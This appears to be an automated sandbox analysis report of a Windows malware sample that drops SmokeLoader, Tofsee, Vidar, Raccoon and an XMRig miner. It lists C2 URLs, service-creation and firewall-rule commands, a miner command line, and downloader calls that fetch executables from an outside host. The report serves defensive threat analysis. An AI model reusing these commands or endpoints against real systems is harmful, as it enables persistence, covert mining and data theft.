Analysis
-
max time kernel
100s -
max time network
157s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
11/01/2022, 20:16
General
-
Target
e7dd618fc92b7d8100f7cc364b9f56e6.exe
-
Size
272KB
-
MD5
e7dd618fc92b7d8100f7cc364b9f56e6
-
SHA1
82a01852cab9ead678bdc9fd218593609766421f
-
SHA256
3a32cec8daca39a42ae3a9c9f8fec4bd7ca3334b9b116a573efd12c8ba0a413b
-
SHA512
3becf96bf43a5112cd9cbf835fadac5a0486c62cd8ee0124d39e4acd117929f5cf4bcedf7fc7ec3cfbfe41d1aed7f44e1a24af6e072e71d302809a267276f079
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
tofsee
patmushta.info
parubey.info
Extracted
vidar
49.6
1125
https://noc.social/@banda5ker
https://mastodon.social/@banda6ker
-
profile_id
1125
Extracted
raccoon
1.8.4-hotfixs
Signatures
-
Arkei
Arkei is an infostealer written in C++.
-
LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Arkei Stealer Payload 2 IoCs
-
LoaderBot executable 2 IoCs
-
Vidar Stealer 1 IoCs
-
XMRig Miner Payload 1 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
-
Modifies Windows Firewall 1 TTPs
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of WriteProcessMemory 60 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e7dd618fc92b7d8100f7cc364b9f56e6.exe"C:\Users\Admin\AppData\Local\Temp\e7dd618fc92b7d8100f7cc364b9f56e6.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\e7dd618fc92b7d8100f7cc364b9f56e6.exe"C:\Users\Admin\AppData\Local\Temp\e7dd618fc92b7d8100f7cc364b9f56e6.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\9B36.exeC:\Users\Admin\AppData\Local\Temp\9B36.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\B550.exeC:\Users\Admin\AppData\Local\Temp\B550.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\C3A3.exeC:\Users\Admin\AppData\Local\Temp\C3A3.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ztrlnomv\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vmaxkqt.exe" C:\Windows\SysWOW64\ztrlnomv\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ztrlnomv binPath= "C:\Windows\SysWOW64\ztrlnomv\vmaxkqt.exe /d\"C:\Users\Admin\AppData\Local\Temp\C3A3.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ztrlnomv "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ztrlnomv2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\D908.exeC:\Users\Admin\AppData\Local\Temp\D908.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\D908.exeC:\Users\Admin\AppData\Local\Temp\D908.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\45FE.exeC:\Users\Admin\AppData\Local\Temp\45FE.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 4122⤵
- Program crash
-
-
C:\Windows\SysWOW64\ztrlnomv\vmaxkqt.exeC:\Windows\SysWOW64\ztrlnomv\vmaxkqt.exe /d"C:\Users\Admin\AppData\Local\Temp\C3A3.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\755C.exeC:\Users\Admin\AppData\Local\Temp\755C.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\8313.exeC:\Users\Admin\AppData\Local\Temp\8313.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\A1DA.exeC:\Users\Admin\AppData\Local\Temp\A1DA.exe1⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\A49B.bat C:\Users\Admin\AppData\Local\Temp\A1DA.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\32161\123.vbs"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exe "/download" "http://a0620531.xsph.ru/htrrfwedsqw.exe" "setup_c.exe" "" "" "" "" "" ""3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\32161\setup_c.exesetup_c.exe3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exe "/download" "http://a0620531.xsph.ru/c_setup.exe" "setup_m.exe" "" "" "" "" "" ""3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\32161\setup_m.exesetup_m.exe3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exe "/download" "http://a0620531.xsph.ru/RMR.exe" "setup_s.exe" "" "" "" "" "" ""3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\32161\setup_s.exesetup_s.exe3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\B896.exeC:\Users\Admin\AppData\Local\Temp\B896.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\D4AF.exeC:\Users\Admin\AppData\Local\Temp\D4AF.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
296KB
-
Filesize
348KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
4KB
-
Filesize
1.1MB
-
Filesize
572KB
-
Filesize
1.4MB
-
Filesize
512KB
-
Filesize
284KB
-
Filesize
276KB
-
Filesize
4KB
-
Filesize
688KB
-
Filesize
384KB
-
Filesize
32KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
28KB
-
Filesize
48KB
-
Filesize
52KB
-
Filesize
76KB
-
Filesize
324KB
-
Filesize
4KB
-
Filesize
4.4MB
-
Filesize
296KB
-
Filesize
688KB
-
Filesize
276KB
-
Filesize
284KB
-
Filesize
512KB
-
Filesize
572KB
-
Filesize
4.4MB
-
Filesize
1.4MB
-
Filesize
348KB
-
Filesize
4.4MB
-
Filesize
428KB
-
Filesize
464KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
328KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
284KB
-
Filesize
348KB
-
Filesize
1.4MB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
572KB
-
Filesize
512KB
-
Filesize
392KB
-
Filesize
276KB
-
Filesize
4KB
-
Filesize
688KB
-
Filesize
296KB
-
Filesize
8KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
68KB
-
Filesize
340KB
-
Filesize
112KB
-
Filesize
36KB
-
Filesize
8KB
-
Filesize
316KB
-
Filesize
580KB
-
Filesize
39.8MB
-
Filesize
552KB
-
Filesize
552KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
276KB
-
Filesize
1.7MB
-
Filesize
1.7MB
-
Filesize
324KB